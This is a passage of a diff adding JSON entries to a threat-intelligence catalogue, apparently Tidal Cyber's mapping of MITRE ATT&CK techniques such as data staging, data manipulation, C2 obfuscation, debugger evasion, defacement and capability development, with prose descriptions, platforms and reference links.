"macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "c0e4f97b-f651-493f-9636-6ac2f6fb46fb", + "value": "Data from Local System" + }, + { + "description": "Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) may be used to gather information.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "875c5aa3-6ab1-4717-9503-9818ccbad98a", + "value": "Data from Network Shared Drive" + }, + { + "description": "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) may be used to gather information. \n\nSome adversaries may also use [Automated Collection](https://app.tidalcyber.com/technique/107ad6c5-79b1-468c-9519-1578bee2ac49) on removable media.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "ae3f9f0f-af66-424c-bcc8-4fdbd7ef9766", + "value": "Data from Removable Media" + }, + { + "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.[[FireEye APT38 Oct 2018](https://app.tidalcyber.com/references/7c916329-af56-4723-820c-ef932a6e3409)][[DOJ Lazarus Sony 2018](https://app.tidalcyber.com/references/950f8c1e-8793-43b7-abc7-0c9f6790b3b7)] By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://app.tidalcyber.com/technique/9cfbe3ba-957e-49fd-9494-9870e5d0ae16) and [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1565.003" + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "3ec6bb34-4134-40c3-8b67-c0aeceae4471", + "value": "Runtime Data Manipulation" + }, + { + "description": "Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.[[FireEye APT38 Oct 2018](https://app.tidalcyber.com/references/7c916329-af56-4723-820c-ef932a6e3409)][[DOJ Lazarus Sony 2018](https://app.tidalcyber.com/references/950f8c1e-8793-43b7-abc7-0c9f6790b3b7)] By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1565.001" + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "d693ca8a-dacf-439e-a16b-5f6b3406a21d", + "value": "Stored Data Manipulation" + }, + { + "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.[[FireEye APT38 Oct 2018](https://app.tidalcyber.com/references/7c916329-af56-4723-820c-ef932a6e3409)][[DOJ Lazarus Sony 2018](https://app.tidalcyber.com/references/950f8c1e-8793-43b7-abc7-0c9f6790b3b7)] By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1565.002" + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "70365fab-8531-4a0e-b147-7cabdfdef243", + "value": "Transmitted Data Manipulation" + }, + { + "description": "Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nThe type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + }, + { + "dest-uuid": "3ec6bb34-4134-40c3-8b67-c0aeceae4471", + "type": "similar" + }, + { + "dest-uuid": "d693ca8a-dacf-439e-a16b-5f6b3406a21d", + "type": "similar" + }, + { + "dest-uuid": "70365fab-8531-4a0e-b147-7cabdfdef243", + "type": "similar" + } + ], + "uuid": "b77f03e8-f7d0-4d0f-8b79-4642d0fe2709", + "value": "Data Manipulation" + }, + { + "description": "Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1001.001" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "584d1c76-7da9-4374-87df-e622d78fc270", + "value": "Junk Data" + }, + { + "description": "Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic. \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1001.003" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "eb15320a-cd24-45b2-b23f-05ef8daf1039", + "value": "Protocol Impersonation" + }, + { + "description": "Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1001.002" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "2735f8d1-0e46-4cd7-bfbb-78941bb266fd", + "value": "Steganography" + }, + { + "description": "Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. ", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + }, + { + "dest-uuid": "584d1c76-7da9-4374-87df-e622d78fc270", + "type": "similar" + }, + { + "dest-uuid": "eb15320a-cd24-45b2-b23f-05ef8daf1039", + "type": "similar" + }, + { + "dest-uuid": "2735f8d1-0e46-4cd7-bfbb-78941bb266fd", + "type": "similar" + } + ], + "uuid": "57f95410-5735-43ae-9fec-8b628a7df985", + "value": "Data Obfuscation" + }, + { + "description": "Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://app.tidalcyber.com/technique/ebd3f870-c513-4fb0-b133-15ffc1f91db2). Interactive command shells may be used, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) and bash may be used to copy data into a staging location.\n\nAdversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.[[Prevailion DarkWatchman 2021](https://app.tidalcyber.com/references/449e7b5c-7c62-4a63-a676-80026a597fc9)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1074.001" + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "8e32b6ed-58b1-4708-8b86-bd29c3a544d2", + "value": "Local Data Staging" + }, + { + "description": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://app.tidalcyber.com/technique/ebd3f870-c513-4fb0-b133-15ffc1f91db2). Interactive command shells may be used, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) and bash may be used to copy data into a staging location.\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88) and stage data in that instance.[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]\n\nBy staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1074.002" + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "cf76b79c-8226-4137-b3dd-8f516611b928", + "value": "Remote Data Staging" + }, + { + "description": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://app.tidalcyber.com/technique/ebd3f870-c513-4fb0-b133-15ffc1f91db2). Interactive command shells may be used, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) and bash may be used to copy data into a staging location.[[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)]\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88) and stage data in that instance.[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]\n\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.", + "meta": { + "platforms": [ + "IaaS", + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + }, + { + "dest-uuid": "8e32b6ed-58b1-4708-8b86-bd29c3a544d2", + "type": "similar" + }, + { + "dest-uuid": "cf76b79c-8226-4137-b3dd-8f516611b928", + "type": "similar" + } + ], + "uuid": "ef4ef020-5cd1-4859-902b-f207828a1281", + "value": "Data Staged" + }, + { + "description": "An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + } + ], + "uuid": "dc98c882-8fba-4a10-bc6f-43088edb87af", + "value": "Data Transfer Size Limits" + }, + { + "description": "Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.[[ProcessHacker Github](https://app.tidalcyber.com/references/3fc82a92-cfba-405d-b30e-22eba69ab1ee)]\n\nDebugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.\n\nSpecific checks will vary based on the target and/or adversary, but may involve [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) function calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or manually checking the BeingDebugged flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).[[hasherezade debug](https://app.tidalcyber.com/references/53b0c71d-c577-40e8-8a04-9de083e276a2)][[AlKhaser Debug](https://app.tidalcyber.com/references/d9773aaf-e3ec-4ce3-b5c8-1ca3c4751622)][[vxunderground debug](https://app.tidalcyber.com/references/8c7fe2a2-64a1-4680-a4e6-f6eefe00407a)]\n\nAdversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) function calls such as OutputDebugStringW().[[wardle evilquest partii](https://app.tidalcyber.com/references/4fee237c-c2ec-47f5-b382-ec6bd4779281)][[Checkpoint Dridex Jan 2021](https://app.tidalcyber.com/references/a988084f-1a58-4e5b-a616-ed31d311cccf)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "945c1564-6c13-4baa-b1d4-6ba82e06a897", + "value": "Debugger Evasion" + }, + { + "description": "An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://app.tidalcyber.com/technique/26db57d5-ce6f-4487-a8a8-b4af1c4b6406) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.[[FireEye Cyber Threats to Media Industries](https://app.tidalcyber.com/references/7b9bd753-01b7-4923-9964-19c59123ace2)][[Kevin Mandia Statement to US Senate Committee on Intelligence](https://app.tidalcyber.com/references/c40a3f96-75f4-4b1c-98a5-cb38129c6dc4)][[Anonymous Hackers Deface Russian Govt Site](https://app.tidalcyber.com/references/ca63ccd4-8c81-4de6-8eb4-06a6c68ce4d3)] [External Defacement](https://app.tidalcyber.com/technique/26db57d5-ce6f-4487-a8a8-b4af1c4b6406) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381).[[Trend Micro Deep Dive Into Defacement](https://app.tidalcyber.com/references/4886418b-3a2e-4f12-b91e-3bb2a8134112)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1491.002" + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "26db57d5-ce6f-4487-a8a8-b4af1c4b6406", + "value": "External Defacement" + }, + { + "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)] Disturbing or offensive images may be used as a part of [Internal Defacement](https://app.tidalcyber.com/technique/546a3318-0e03-4b22-95f5-c02ff69a4ebf) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1491.001" + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "546a3318-0e03-4b22-95f5-c02ff69a4ebf", + "value": "Internal Defacement" + }, + { + "description": "Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b) in order to cause user discomfort, or to pressure compliance with accompanying messages. \n", + "meta": { + "platforms": [ + "IaaS", + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + }, + { + "dest-uuid": "26db57d5-ce6f-4487-a8a8-b4af1c4b6406", + "type": "similar" + }, + { + "dest-uuid": "546a3318-0e03-4b22-95f5-c02ff69a4ebf", + "type": "similar" + } + ], + "uuid": "9a21c7c7-cf8e-4f05-b196-86ec39653e3b", + "value": "Defacement" + }, + { + "description": "Adversaries may use [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043) to decode a remote access tool portable executable file that has been hidden inside a certificate file.[[Malwarebytes Targeted Attack against Saudi Arabia](https://app.tidalcyber.com/references/735647f9-9cd4-4a20-8812-4671a3358e46)] Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.[[Carbon Black Obfuscation Sept 2016](https://app.tidalcyber.com/references/bed8ae68-9738-46fb-abc9-0004fa35636a)]\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. [[Volexity PowerDuke November 2016](https://app.tidalcyber.com/references/4026c055-6020-41bb-a4c8-54b308867023)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "88c2fb46-877a-4005-8425-7639d0da1920", + "value": "Deobfuscate/Decode Files or Information" + }, + { + "description": "Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.\n\nContainers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow.[[Docker Containers API](https://app.tidalcyber.com/references/2351cb32-23d6-4557-9c52-e6e228402bab)][[Kubernetes Dashboard](https://app.tidalcyber.com/references/02f23351-df83-4aae-a0bd-614ed91bc683)][[Kubeflow Pipelines](https://app.tidalcyber.com/references/0b40474c-173c-4a8c-8cc7-bac2dcfcaedd)] Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.[[Aqua Build Images on Hosts](https://app.tidalcyber.com/references/efd64f41-13cc-4b2b-864c-4d2352cdadcd)]", + "meta": { + "platforms": [ + "Containers" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "2618638c-f6bd-4840-a297-c45076e094a9", + "value": "Deploy Container" + }, + { + "description": "Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.[[Wikipedia Code Signing](https://app.tidalcyber.com/references/363e860d-e14c-4fcd-985f-f76353018908)] Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://app.tidalcyber.com/technique/9449c0d5-7445-45e0-9861-7aafd6531733), adversaries may develop self-signed code signing certificates for use in operations.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1587.002" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "6f152555-36a5-4ec9-8b9b-f0b32c3ccef8", + "value": "Code Signing Certificates" + }, + { + "description": "Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).\n\nAdversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)) or even enabling [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) if added to the root of trust (i.e. [Install Root Certificate](https://app.tidalcyber.com/technique/3a956db0-a3f0-442a-a981-db2ee20d60b2)).\n\nAfter creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://app.tidalcyber.com/technique/0b2a9df9-65c8-4a01-a0e6-d411e54a4c7b)) on infrastructure under their control.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1587.003" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "5bcbb0c5-7061-481f-a677-09028a6c59f7", + "value": "Digital Certificates" + }, + { + "description": "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.[[NYTStuxnet](https://app.tidalcyber.com/references/38b0cf78-88d0-487f-b2b0-81264f457dd0)] Adversaries may use information acquired via [Vulnerabilities](https://app.tidalcyber.com/technique/fe96475a-3090-449d-91fd-ae73cb4d9c7c) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.[[Irongeek Sims BSides 2017](https://app.tidalcyber.com/references/ce11568a-36a8-4da2-972f-9cd67cc337d8)]\n\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a), [Exploitation for Client Execution](https://app.tidalcyber.com/technique/068df3d7-f788-44e4-9e6b-2ae443af1609), [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c), [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391), [Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef), [Exploitation of Remote Services](https://app.tidalcyber.com/technique/51ff4ada-8a71-4801-9cb8-a6e216eaa4e4), and [Application or System Exploitation](https://app.tidalcyber.com/technique/2109de05-5b45-4519-94a2-6c04f7d88286)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1587.004" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "5a57d258-0b23-431b-b50e-3150d2c0e52c", + "value": "Exploits" + }, + { + "description": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)][[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)][[ActiveMalwareEnergy](https://app.tidalcyber.com/references/f2ef73c6-5d4c-423e-a3f5-194cba121eb1)][[FBI Flash FIN7 USB](https://app.tidalcyber.com/references/42dc957c-007b-4f90-88c6-1afd6d1032e8)]\n\nAs with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.\n\nSome aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://app.tidalcyber.com/technique/2e883e0d-1108-431a-a2dd-98ba98b69417).[[FireEye APT29](https://app.tidalcyber.com/references/78ead31e-7450-46e8-89cf-461ae1981994)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1587.001" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "0f77a14a-d450-4885-b81f-23eeffa53a7e", + "value": "Malware" + }, + { + "description": "Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)][[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)][[Bitdefender StrongPity June 2020](https://app.tidalcyber.com/references/7d2e20f2-20ba-4d51-9495-034c07be41a8)][[Talos Promethium June 2020](https://app.tidalcyber.com/references/188d990e-f0be-40f2-90f3-913dfe687d27)]\n\nAs with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + }, + { + "dest-uuid": "6f152555-36a5-4ec9-8b9b-f0b32c3ccef8", + "type": "similar" + }, + { + "dest-uuid": "5bcbb0c5-7061-481f-a677-09028a6c59f7", + "type": "similar" + }, + { + "dest-uuid": "5a57d258-0b23-431b-b50e-3150d2c0e52c", + "type": "similar" + }, + { + "dest-uuid": "0f77a14a-d450-4885-b81f-23eeffa53a7e", + "type": "similar" + } + ], + "uuid": "bf660248-2098-499b-b90c-8c47efb26c70", + "value": "Develop Capabilities" + }, + { + "description": "Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c)).\n\nMany OS utilities may provide information about local device drivers, such as `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows.[[Microsoft Driverquery](https://app.tidalcyber.com/references/7302dc00-a75a-5787-a04c-88ef4922ac09)][[Microsoft EnumDeviceDrivers](https://app.tidalcyber.com/references/647ffc70-8eab-5f2f-abf4-9bbf42554043)] Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://app.tidalcyber.com/technique/e0a347e2-2ac5-458b-ab0f-18d81b6d6055)) may also be available in the Registry.[[Microsoft Registry 